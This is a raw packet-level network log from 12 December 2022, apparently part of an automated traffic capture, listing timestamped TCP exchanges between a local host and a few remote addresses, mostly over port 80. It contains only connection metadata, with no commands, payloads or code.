                                                                                                                                                                                                                                                                Dec 12, 2022 18:53:58.936273098 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:53:58.936410904 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:00.421794891 CET4970040500192.168.2.376.105.84.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:00.982439041 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:01.044547081 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:01.044639111 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:01.044702053 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:03.086524010 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:03.149180889 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:03.149226904 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:03.149362087 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:03.536540031 CET4970040500192.168.2.376.105.84.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.198343992 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.260870934 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.260920048 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.260946035 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.260972023 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.261004925 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.261033058 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264813900 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264847994 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264874935 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264878988 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264899969 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264910936 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264928102 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264933109 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264955997 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264957905 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.264980078 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.265041113 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.268876076 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.268930912 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.323137999 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.323190928 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.323292971 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:05.323585033 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.274350882 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.340831995 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.340974092 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.347875118 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412408113 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412508011 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412537098 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412590027 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412672997 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412698030 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412720919 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412723064 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412744999 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412770987 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412784100 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412796974 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412797928 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412823915 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412839890 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.412869930 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.477020979 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.477063894 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:06.477197886 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:09.552586079 CET4970040500192.168.2.376.105.84.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.438412905 CET4970225192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.580440044 CET254970298.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.580652952 CET4970225192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.995547056 CET254970298.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:13.037322044 CET4970225192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:13.239712954 CET4970225192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:13.251966000 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:13.316591024 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:13.316802979 CET8049701185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:13.316900969 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.204058886 CET4970380192.168.2.3104.18.114.97
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.220980883 CET8049703104.18.114.97192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.221071959 CET4970380192.168.2.3104.18.114.97
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.222368002 CET4970380192.168.2.3104.18.114.97
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.239021063 CET8049703104.18.114.97192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.253726959 CET8049703104.18.114.97192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.253843069 CET4970380192.168.2.3104.18.114.97
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.327647924 CET4970480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.394038916 CET8049704185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.394217968 CET4970480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.395418882 CET4970480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.460549116 CET8049704185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.463386059 CET8049704185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.463552952 CET4970480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.516987085 CET4970480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.518769026 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.585489035 CET8049704185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.585582972 CET4970480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.585953951 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.586061954 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.587249041 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.653851032 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656218052 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656246901 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656272888 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656296968 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656322002 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656344891 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656363964 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656368971 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656394005 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656416893 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656425953 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656440973 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656449080 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.656476021 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.727782965 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.727839947 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.727868080 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.727897882 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728012085 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728069067 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728198051 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728231907 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728245974 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728257895 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728266001 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728285074 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728293896 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728318930 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728353024 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728379965 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728389025 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728404999 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728413105 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728431940 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728442907 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728458881 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728466034 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728485107 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728493929 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728511095 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728521109 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728535891 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728545904 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728560925 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728569984 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728586912 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728595018 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728614092 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728624105 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728638887 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728647947 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.728674889 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.794820070 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.794872046 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.794913054 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.794943094 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.794971943 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.794998884 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795007944 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795030117 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795059919 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795073032 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795087099 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795100927 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795118093 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795133114 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795147896 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795156956 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795173883 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795186996 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795206070 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795430899 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795460939 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795475006 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795488119 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795495033 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795511961 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795520067 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795548916 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795562029 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795597076 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795608997 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795643091 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795655012 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795682907 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795689106 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795711040 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795716047 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795739889 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795744896 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795768023 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795778990 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795795918 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795800924 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795829058 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795845985 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795872927 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795880079 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795902967 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795909882 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795929909 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795934916 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795954943 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795963049 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795980930 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.795986891 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796008110 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796014071 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796035051 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796041012 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796058893 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796066999 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796083927 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796089888 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796108961 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796117067 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796133041 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796142101 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796159029 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796164036 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796190023 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796216965 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796248913 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796277046 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796313047 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796319962 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.796355009 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.808490038 CET4970180192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.809990883 CET4970680192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862171888 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862236977 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862267017 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862278938 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862291098 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862318993 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862318993 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862349033 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862377882 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862394094 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862406969 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862427950 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862435102 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862442017 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862461090 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862477064 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862488031 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862494946 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862514019 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862529993 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862536907 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862546921 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862560987 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862571001 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862586021 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862597942 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862617016 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862624884 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862647057 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862657070 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862673998 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862683058 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862701893 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862709999 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862735987 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862736940 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862761974 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862782955 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862798929 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862801075 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862833023 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862835884 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862864971 CET8049705185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862870932 CET4970580192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:16.862915039 CET4970580192.168.2.3185.215.113.66
